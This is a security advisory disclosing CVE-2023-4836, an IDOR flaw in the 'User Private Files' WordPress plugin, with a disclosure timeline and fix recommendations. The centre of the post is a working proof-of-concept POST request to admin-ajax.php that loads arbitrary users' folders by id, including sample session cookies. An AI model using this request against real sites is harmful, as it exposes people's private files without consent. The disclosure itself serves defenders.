CVE-2023-4836 – User Private Files – IDOR to Sensitive data and private files exposure / leak of info – POC

When testing the plugin, the vulnerability “Insecure direct object references (IDOR)” was discovered, which allows you to view someone else’s folder through a specialized request to the server and download files of someone else without his consent, even if he did not share the file. All users and their files that they have ever downloaded are at risk. This vulnerability can be carried out from the user with the lowest privileges – “Subscriber”, if there is a page with the plugin’s shortcode on your site, or on behalf of the user “Contributor” to create a page with this plugin.

Main info:

CVE	CVE-2023-4836
Plugin	User Private Files – WordPress File Sharing Plugin
Critical	Very High
Publicly Published	October 9, 2023
Last Updated	October 9, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4836 https://wpscan.com/vulnerability/c17f2534-d791-4fe3-b45b-875777585dc6
Plugin Security Certification by CleanTalk

Timeline

August 14, 2023	Plugin testing and vulnerability detection in the User Private Files – WordPress File Sharing Plugin plugin have been completed
August 14, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 26, 2023	The author has released a fix update
October 9, 2023	Registered CVE-2023-4836

Discovery of the Vulnerability

While conducting a comprehensive evaluation of the User Private Files plugin, a significant security vulnerability was identified – “Insecure Direct Object References (IDOR).” This vulnerability allows malicious actors to access someone else’s folders, download files without consent, and potentially expose sensitive data. Even users who have never shared their files are at risk. Remarkably, this security flaw can be exploited by users with minimal privileges, such as “Subscribers,” provided that a page with the plugin’s shortcode exists on the website or by “Contributors” when creating a page with the plugin.

Understanding of IDOR attack’s

“Insecure Direct Object References (IDOR)” is a security issue where an attacker can manipulate input and gain unauthorized access to data or resources. In the context of this vulnerability, attackers can craft specialized requests to the server to access folders and download files belonging to other users, even without explicit sharing permissions.

Exploiting the IDOR

Exploiting the IDOR vulnerability in the User Private Files plugin involves manipulating requests to access and download files from other users’ folders. Attackers, even with minimal privileges, can craft requests to bypass access controls and obtain sensitive files. This can be accomplished through targeted URL manipulation or by creating pages with the plugin and subsequently accessing files linked to those pages.

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

Host: your_site

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=—————————9502138512374627775493398790

Content-Length: 427

Origin: http://your_site

Connection: close

Referer: http://your_site/wordpress/?p=353

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1691948630%7C6nakHLX7V9a8tsLj73IR18n6O2i78yRcGA3zDOchEqj%7C42aa9939bd3f232972786fa53b21ec360ce77c3a4eeab81598e87bb459445128; thc_time=1693728697; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1691948630%7C6nakHLX7V9a8tsLj73IR18n6O2i78yRcGA3zDOchEqj%7Ce08aa71d0671f82a0540ae982432a502c621e3332be543dcf8daef2f78a255d3

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

—————————–9502138512374627775493398790

Content-Disposition: form-data; name=”fldr_id”

{here_you_can_put_your_number_from_0_to_9999}

—————————–9502138512374627775493398790

Content-Disposition: form-data; name=”upf_nonce”

72b5f13e74

—————————–9502138512374627775493398790

Content-Disposition: form-data; name=”action”

upvf_pro_load_flder

—————————–9502138512374627775493398790–

The risks associated with CVE-2023-4836 are substantial. An attacker who successfully exploits this vulnerability can:

• Access sensitive files and data belonging to other users.
• Download files without the owner’s consent, even if they were never shared.
• Potentially expose confidential information.
• Compromise the privacy and security of user data.

In a real-world scenario, imagine an attacker leveraging this vulnerability to access and download files from unsuspecting users on a website utilizing the User Private Files plugin. By manipulating URLs or creating pages with the plugin, the attacker can access files that were never meant to be shared or accessed by unauthorized users. This could lead to data breaches, privacy violations, and reputational damage to the website.

Recommendations for Improved Security

To mitigate the risks posed by CVE-2023-4836 and enhance the overall security of websites using the User Private Files plugin, consider the following recommendations:

• Update the plugin: Ensure the User Private Files plugin is updated to the latest version, which should include a patch to address this vulnerability.
• Access controls: Implement robust access controls and authorization mechanisms to prevent unauthorized access to user files and data.
• Security testing: Conduct thorough security testing and vulnerability assessments to identify and rectify IDOR vulnerabilities proactively.
• User awareness: Educate website users about privacy and the importance of not sharing sensitive files through public pages or links.
• Least privilege principle: Limit the capabilities and permissions of user roles to reduce the potential impact of a compromised account.

By adhering to these recommendations, website administrators can significantly reduce the risk of IDOR vulnerabilities and enhance the overall security posture of their WordPress installations.

#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.